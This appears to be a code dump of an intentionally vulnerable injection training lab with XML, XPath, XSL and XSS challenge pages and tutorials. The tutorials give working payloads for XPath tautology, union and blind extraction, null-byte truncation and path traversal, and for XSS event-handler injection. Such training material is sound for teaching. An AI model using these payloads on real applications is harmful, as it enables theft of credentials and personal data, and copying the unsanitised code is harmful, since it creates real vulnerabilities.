26 | 27 | This challenge requires you to insert your own data tag and prevent the original from being parsed.
28 |
29 | Your objective is to get the application to return only the value "winrar". 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - Attribute
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | 44 | Injection String:
45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xmlmao/xmli_challenges/challenge5.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XML Injection Challenge 5 - XInclude 17 | 18 | 19 | 20 |

XMLmao - XML Injection Challenge 5 - XInclude


21 | 22 |
23 |
24 |
25 |
26 | 27 | XInclude is a way of merging XML documents or creating dynamic XML content by including external content. 28 |
29 | Your objective is to read /etc/passwd or c:\boot.ini using XInclude. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - CDATA-wrapped value
34 | Sanitization - None
35 | Output - Full results, verbose errors
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | 44 | Injection String:
45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xmlmao/xmli_challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | XMLmao XMLi Challenge 0 - Hello, world! 2 | ---------------------- 3 | In this challenge, we have an XML injection scenario: Our data is being placed into the context of an XML document without sanitization. As such, we can affect the contents of the XML document to cause mischief. In this particular scenario, we are injecting a new "data" node into the document. 4 | 5 | The unaltered XML document looks like this: 6 | 7 | 8 | 9 | Inject1 10 | 11 | 12 | 13 | 14 | 15 | 16 | Our injection string is replacing the content of the data node where "Inject3" appears. The "CDATA" tag means that data inside is to be interpreted as literal. Inside that tag, no XML fiddling can occur. First, we break out of that tag with the character sequence "]]>". Unfortunately, this leaves us with a malformed XML document. XML parsers are generally strict, so we'll only get an error and unhappiness. We'll get to that later. For now, our injection string looks like this: 17 | 18 | foo]]> 19 | 20 | We're also inside an existing data node, so we need to break out of that. We can do that by injecting an end data tag, making our injection string as follows: 21 | 22 | foo]]> 23 | 24 | Now we're ready to open a new data tag: 25 | 26 | foo]]> 27 | 28 | The only thing left is to open up a new CDATA tag and value to return us to a well-formatted document: 29 | 30 | foo]]> 35 | 36 | Inject1 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /xmlmao/xmli_challenges/tutorial1.txt: -------------------------------------------------------------------------------- 1 | XMLmao XMLi Challenge 1 - There Can Be Only One 2 | ---------------------- 3 | In this challenge, we have two tasks: One, insert our own data tag. 
Two, prevent the original data tag from being parsed. Our original XML data looks like this: 4 | 5 | 6 | 7 | Inject1 8 | 9 | 10 | 11 | 12 | 13 | 14 | Our injection string will replace "Inject2". First, we need to break out of the attribute and "hooray" tag. So, our injection string starts with: 15 | 16 | "> 17 | 18 | Next, we must define our data tag with the data "winrar", which completes the first task and brings us to this injection string: 19 | 20 | "> 21 | 22 | Unfortunately, this leaves us with broken XML and two data tags. However, the XML parser, libxml, is written in native code. Additionally, the XML is being constructed as a string before being fed into the parser. As such, we can use a null byte to prematurely end the XML and prevent the original data tag from being read, completing the second task. We'll need to ensure that our other tags are properly closed, so we add a closing tag to end the "xmlfile" node. Our final injection string looks like this: 23 | 24 | ">%00 25 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XPath Challenge 0 - Hello, world! 17 | 18 | 19 | 20 |

XMLmao - XPath Challenge 0 - Hello, world!


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform the simplest of XPath injection attacks.
28 |
29 | Your objective is to get the query to return all usernames instead of just one. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - All results, verbose errors, query shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | 44 | Injection String:
45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/challenge1.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XPath Challenge 1 - Retrieve ALL the Nodes! 17 | 18 | 19 | 20 |

XMLmao - XPath Challenge 1 - Retrieve ALL the Nodes!


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform a very basic XPath injection attack.
28 |
29 | Your objective is to get the query to return the entire set of nodes in the XML document. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - All results, query shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | 44 | Injection String:
45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/challenge3.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XPath Challenge 3 - Looking Through a Keyhole 17 | 18 | 19 | 20 |

XMLmao - XPath Challenge 3 - Looking Through a Keyhole


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform an XPath injection attack in a string field. Only one value is returned.
28 |
29 | Your objective is to pull the social security numbers from the XML document. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - One result, generic errors, query not shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | Injection String:
44 | 45 |
46 |
47 | 48 | 49 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/challenge4.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XPath Challenge 4 - Love is Blind 17 | 18 | 19 | 20 |

XMLmao - XPath Challenge 4 - Love is Blind


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform an XPath injection attack in a string field where no results are shown.
28 |
29 | Your objective is to pull the social security numbers from the XML document. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - Boolean results, no errors, query not shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | Injection String:
44 | 45 |
46 |
47 | 48 | 49 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | XMLmao Challenge 0 - Hello, world! 2 | ---------------------- 3 | The original query you're working with is /xmlfile/users/user[username='YOUR_INPUT_GOES_HERE']/username. 4 | The part in square brackets, the condition, specifies that only user nodes whose username is equal to your input are selected. However, because your input is placed inside the quoted string without sanitization, a single quote in it ends the string and the rest is parsed as part of the condition. As with the WHERE clause in a SQL statement, it is then possible to nullify the condition with an "or" keyword and a tautology like "'a'='a'" such that all results are returned regardless of condition. Such a condition would look like this: [username='user' or 'a'='a']. 5 | 6 | To cause the condition of the query to be nullified and all the usernames returned, your input should be: 7 | 8 | user' or 'a'='a 9 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial1.txt: -------------------------------------------------------------------------------- 1 | XMLmao Challenge 1 - Retrieve ALL the Nodes! 2 | ====================== 3 | In SQL injection, the UNION keyword joins the output of SELECT queries into one result set. The equivalent in XPath is the pipe character. If X and Y are queries, we can say that X | Y returns the results of X along with the results of Y. If we want to return every node in an XML dataset, the query would be: 4 | 5 | /* 6 | 7 | Our injection needs to turn both the first and second halves of the query into complete and syntactically correct XPath queries which return no data, and join their results with a query for all nodes in the database. 
If the query looks like this: 8 | 9 | /xmlfile/users/user[username='OUR_INPUT']/username 10 | 11 | We must first complete the portion before our input: 12 | 13 | /xmlfile/users/user[username=' 14 | 15 | We can do this with the string a'] which makes the first query in the set look like this: 16 | 17 | /xmlfile/users/user[username='a'] 18 | 19 | We also need to complete the portion after our input: 20 | 21 | ']/username 22 | 23 | It's important to note that invalid node names don't result in query failure; they just return no results. So, we can use the prefix /a['a to turn the portion after our input into the following query: 24 | 25 | /a['a']/username 26 | 27 | Now all we need to do is join both queries with our all-nodes query using pipes, which looks like |/*| when you put it together. All in all, our resulting query will look like this: 28 | 29 | /xmlfile/users/user[username='a']|/*|/a['a'] 30 | 31 | So, a correct answer to challenge 1 is: 32 | 33 | a']|/*|/a['a 34 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial2.txt: -------------------------------------------------------------------------------- 1 | XMLmao Challenge 2 - The Failure of Quote Filters 2 | ================================= 3 | In this challenge, we see how filtering single quotes is not entirely effective. In SQL Injection, this presents an interesting obstacle, but not a significant one. In XPath injection, it presents much less difficulty. 4 | 5 | In "Challenge 1 - Retrieve ALL the Nodes!" we used a technique to retrieve all nodes from the document when injection occurs in a condition within the XPath query. If you're unfamiliar with that technique, you'll understand this tutorial better if you play through Challenge 1 first. 6 | 7 | In this challenge, we make a very slight modification: We don't use single quotes. That's about it! 
8 | 9 | The query looks something like this: 10 | 11 | /xmlfile/users/user[id=OUR_INPUT_HERE]/username 12 | 13 | The input lands in an unquoted numeric comparison, so no quote character is needed to leave the value context and a quote filter has nothing to remove. What we need to do is to make this one query into three queries: one will return the entire set of nodes in the XML dataset, and the other two will return nothing. Our injection string will cause the query to look like this after injection: 14 | 15 | /xmlfile/users/user[id=3]|/node()|/a[1] 16 | 17 | One correct answer, then, is: 18 | 19 | 3]|/*|/a[1 20 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial4.txt: -------------------------------------------------------------------------------- 1 | Challenge 4 - Love is Blind 2 | ========================== 3 | In this challenge, we have no output from the query, only an indication of whether or not the query returned results. In the previous challenge, we could retrieve one value at a time but had to use blind techniques to understand the structure of the data. We start by enumerating the structure in the same way as in the previous challenge. Instead of retrieving the value of each node as in the previous example, we must now use blind techniques to extract the data. 4 | 5 | A technique we can use to do so involves the substring() function. The following query will return results only if the first character in the first child node of the root is equal to 'a': 6 | 7 | /*[substring(/*[1],1,1)='a'] 8 | 9 | We can use our query to achieve the same by manipulating the condition to hinge on the evaluation of the substring. We can do this using a known username value or with the use of the 'or' keyword. 
10 | 11 | With: /xmlfile/users/user[username='jsmiley' and substring(/*[1],1,1)='a']/username 12 | Without: /xmlfile/users/user[username='' or 1=1 and substring(/*[1],1,1)='a']/username 13 | 14 | The "without" version is more useful as we don't need to know an existing value. 
15 | 16 | By iterating through a character set of likely characters for each character in the value to be retrieved, we can slowly determine the value. 17 | 18 | This process can be automated using the tools "BXPI" and "XPath Blind Explorer". As of this writing, XPath Blind Explorer URL-encodes the ampersand character in GET or POST data and as such cannot properly handle pages which require multiple parameters to be set, such as XMLmao. This can be overcome by using Burp Proxy to convert any "%26" back to "&". 19 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial5.txt: -------------------------------------------------------------------------------- 1 | Challenge 5 - Pipe Dream 2 | ===================== 3 | In this challenge, we must retrieve passwords for all the users in our database without using the pipe character. Our initial query looks like this: 4 | 5 | /xmlfile/users/user[username='OUR_INPUT_HERE']/username 6 | 7 | It has been said that it is not possible to comment out the end of XPath queries as is done with SQL injection attacks. While this is true, we do have an option for truncating an XPath query prematurely: The Poison Null Byte. 8 | 9 | C-based languages use the null byte as a string terminator and will stop reading any string given to it when reaching a null byte. Since libxml is written in a C-based language, the XPath query given to it by our PHP script (which actually reads the whole string) will be truncated if a null byte is present. The URL-encoded version of a null byte is "%00". 10 | 11 | As we control the portion of the query which comes before the field in the user object is selected, we can truncate the portion of the query which specifies that only the username is to be returned. We can do this by closing the condition and truncating the rest with a null byte. 
The final query will look like this to PHP: 12 | 13 | /xmlfile/users/user[username='']%00']/username 14 | 15 | And libxml will read it as: 16 | 17 | /xmlfile/users/user[username=''] 18 | 19 | Our only problem is that this only returns the password for any user with a blank username, which is unlikely to return any data. As such, we can use our condition nullifying trick from Challenge 0 in tandem with the null byte to pull all data for all users, which includes password data. The final query looks like this: 20 | 21 | /xmlfile/users/user[username='' or '1'='1']%00']/username 22 | 23 | Which is read by libxml as the following: 24 | 25 | /xmlfile/users/user[username='' or '1'='1'] 26 | 27 | This returns us the entire set of user data, without using the pipe character. 28 | 29 | So, one correct answer to Challenge 5 is: 30 | 31 | ' or '1'='1']%00 32 | -------------------------------------------------------------------------------- /xmlmao/xpath_challenges/tutorial6.txt: -------------------------------------------------------------------------------- 1 | Challenge 6 - Up, Up, and Away! 2 | ======================= 3 | In file paths, there is a double-dot marker (..) which points to the parent directory. For example, the path /usr/sbin/sshd could also be represented as /etc/../usr/bin/../sbin/sshd or numerous other variations. Path traversal attacks frequently utilize this to traverse upwards in a file tree and access content from a wider context. This marker is also available within XPath. As such, we can take an XPath query which returns a very specific set of results and get it to return a far wider set using parent directory markers. Our original query looks like this: 4 | 5 | /xmlfile/users/user[username='jsmiley']/OUR_INPUT_HERE 6 | 7 | To begin with, we have a very specific context. We can choose any field within the set of child nodes for the user 'jsmiley'. UNLESS we use path traversal techniques! 
One important thing to note is that with normal path traversal attacks, we can make a valid path just by throwing a metric ton of "../" on there, extra markers are simply discarded. This is not the case with XPath, we need exactly the right number. 8 | 9 | As such, if we do not know the query to begin with we can simply brute force, trying one marker, then two, then three, each time ending with an asterisk to return all nodes: 10 | 11 | ../* 12 | ../../* 13 | ../../../* 14 | 15 | Once we stop receiving results, we know we've gone too far and traversed past the root of the document. So, one correct answer is: 16 | 17 | ../../../* 18 | -------------------------------------------------------------------------------- /xmlmao/xslt_challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XSL Injection Challenge 0 - Hello, world! 17 | 18 | 19 | 20 |

XMLmao - XSL Injection Challenge 0 - Hello, world!


21 | 22 |
26 | 27 | You must perform the simplest of XSL injection attacks.
28 |
29 | Your objective is to retrieve passwords from the XML document. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - Static content in output
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | Injection String:
44 | 45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xssmh/challenges.htm: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | XSSmh - Challenges 15 | 16 | 17 | 18 |

XSSmh - Challenges


19 |
23 | Challenge 0 - alert("Hello, world!");
24 | Challenge 1 - The Failure of Quote Filters
25 | Challenge 2 - Basic Persistent Threat
26 | Challenge 3 - AttriBeautiful
27 | Challenge 4 - Black Comedy
28 | Challenge 5 - Detour
29 | Challenge 6 - Up the Chain
30 | Challenge 7 - Crouching JS, Hidden Field
31 |
32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /xssmh/challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XSSmh - Challenge 0 - alert("Hello, world!"); 17 | 18 | 19 | 20 |

XSSmh - Challenge 0 - alert("Hello, world!");


21 | 22 |
26 | 27 | You must perform the simplest of XSS attacks.
28 |
29 | Your objective is to cause an alert box to pop up on the resulting page.
30 | (Note: Some browsers have anti-XSS protections which prevent this from working. Try using Firefox, Safari, or old versions of Internet Explorer.) 31 | 32 |
33 | PARAMETERS:
34 | Injection Type - Injection into HTML body
35 | Sanitization - None
36 | 
37 | 38 |
39 |
40 | 41 | Injection String:
42 | 43 |
44 |
45 | 46 | 47 | -------------------------------------------------------------------------------- /xssmh/challenges/challenge2.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XSSmh - Challenge 2 - Basic Persistent Threat 17 | 18 | 19 | 20 |

XSSmh - Challenge 2 - Basic Persistent Threat


21 | 22 |
26 | 27 | You must perform the simplest of persistent XSS attacks.
28 |
29 | Your objective is to cause an alert box to pop up on the resulting page.
30 | (Note: Use any browser you like for this, browser based anti-XSS protections do not apply to persistent flaws.) 31 | 32 |
33 | PARAMETERS:
34 | Injection Type - Injection into HTML body
35 | Sanitization - None
36 | 
37 | 38 |
39 |
40 | 41 | 42 | Injection String:
43 | 44 |
45 |
46 | 47 | 48 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 0 - alert("Hello, world!"); 2 | --------------- 3 | This challenge tasks you with the most basic form of cross-site scripting attack possible. 4 | 5 | All you need to do is write a script directly into the injection point, like so: 6 | 7 | 8 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial1.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 1 - The Failure of Quote Filters 2 | --------------- 3 | In this challenge, you must write a script into the resulting HTML which does not use single or double quotes. 4 | 5 | There are several ways to achieve this, one of the simplest is using regular expressions and the "source" property. 6 | 7 | 8 | 9 | Another variation uses the "String.fromCharCode" method. This is slightly more complex, but has the advantage that you don't need your string to be a valid regular expression and is thus more flexible. This involves converting your string into a series of bytes in ASCII decimal representation. For instance, the decimal value of 'h' is 104. The same alert box could be built using the following syntax: 10 | 11 | 12 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial2.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 2 - Basic Persistent Threat 2 | --------------- 3 | This challenge tasks you with the most basic form of cross-site scripting attack possible. 
4 | 5 | All you need to do is write a script directly into the injection point, like so: 6 | 7 | 8 | 9 | This challenge is included in XSSmh not so that you can launch a complicated attack, but simply to demonstrate the limitations of XSS protections which aren't based in good programming practices. 10 | 11 | To my knowledge, there is no WAF, browser or browser add-on which will prevent Javascript execution in a persistent scenario. (Please correct me if I am mistaken.) 12 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial3.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 3 - AttriBeautiful 2 | --------------- 3 | In this challenge, you must cause Javascript to execute when injecting inside an existing HTML tag and without breaking out of the tag. 4 | 5 | This involves adding another attribute to the HTML tag which executes Javascript. This can be done using event handlers. Browsers support attributes which define Javascript to be executed when certain events occur, like a mouse click. 6 | 7 | One of the easiest to use is "onload" which executes Javascript as soon as a part of the DOM has been loaded. However, as we're injecting into an "input" tag, the "onload" attribute cannot be used. Instead, we can use "onmouseover", which executes Javascript when the mouse cursor moves over the element. 8 | 9 | Our original input tag looks as follows: 10 | 11 | Our injection string can be: 12 | test" onmouseover="alert(1)" fakeattribute=" 13 | Which results in the following input tag: 14 | 15 | 16 | Once a user mouses over the input box, an alert box is displayed. 17 | 18 | Additionally, we can use CSS to expand the input box to cover the entire window, making a mouseover event far more likely. We do this by adding a "style" attribute, which allows us to specify CSS attributes in-line. 
We specify absolute positioning, a position at the upper left corner of the window, and a width and height of 100%, ensuring 100% coverage of the window. 19 | 20 | Our injection string looks like this: 21 | test" onmouseover="alert(1)" style="position:absolute;top:0px;left:0px;width:100%;height:100%" fakeattribute=" 22 | This results in the following input tag, which covers the entire window and fires Javascript code when the mouse moves over the window: 23 | 24 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial4.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 4 - Black Comedy 2 | --------------- 3 | In this challenge, you must cause Javascript to execute without using the word "script". 4 | 5 | This is deceptively easy. As we learned in the previous challenge, we can use event handler attributes to cause Javascript execution. When we control the whole tag, it is even easier. 6 | 7 | One way we can do this is with a "body" tag bearing an "onload" attribute: 8 | 9 | 10 | You could also use an "img" tag with a bad "src" attribute and an "onerror" attribute which will fire as soon as the image loading fails: 11 | 12 | 13 | Additionally, other tags allow onerror and onload attributes, like the tag: 14 | 15 | -------------------------------------------------------------------------------- /xssmh/challenges/tutorial5.txt: -------------------------------------------------------------------------------- 1 | XSSmh - Challenge 5 - Detour 2 | --------------- 3 | This challenge deviates from the previous ones in that the difficulty is not in gaining Javascript execution, but in utilizing it effectively. Javascript has the ability to modify the existing DOM, and one effective attack is to redirect a form submission to somewhere else. This is what you are tasked with doing in this challenge. 
4 | 5 | In order to understand how this is done, we must understand how to reference DOM objects from Javascript. Let's abstract it a little and pretend we're referencing the city of Boston in the United States. We could do so like this: 6 | 7 | earth.northAmerica.unitedStates.massachusetts.boston 8 | 9 | We start by referencing the broadest item, and slowly work our way down the hierarchy to specify the element we want. If we want to reference the "action" attribute of the 2nd form in our document, we do so with the following path (the forms collection is zero-indexed, so index 1 is the second form): 10 | 11 | document.forms[1].action 12 | 13 | We can then set this to an arbitrary location through simple assignment. So, our attack string would look like this: 14 | 15 | 16 | -------------------------------------------------------------------------------- /xssmh/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 |
15 | | Cross-Site Scripting || Challenges | 16 |
22 | -------------------------------------------------------------------------------- /xssmh/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: xss.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /xssmh/pxss.html: -------------------------------------------------------------------------------- 1 | Uh, this is awkward. You haven't written anything here yet. 2 | -------------------------------------------------------------------------------- /xssmh/setup.sh: -------------------------------------------------------------------------------- 1 | ######################################################################### 2 | # 3 | # Magical Code Injection Rainbow - A set of configurable injection testbeds 4 | # Daniel "unicornFurnace" Crowley 5 | # Copyright (C) 2014 Trustwave Holdings, Inc. 6 | # 7 | # This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 10 | # 11 | # You should have received a copy of the GNU General Public License along with this program. If not, see . 12 | # 13 | ######################################################################## 14 | 15 | echo "Hey there\! Thanks for installing XSSmh. Enjoy\!" 16 | chmod 666 pxss.html && echo "Hooray\! Everything went fine\!" || echo "Couldn't chmod pxss.html. Do it manually or run setup.sh as root."; 17 | --------------------------------------------------------------------------------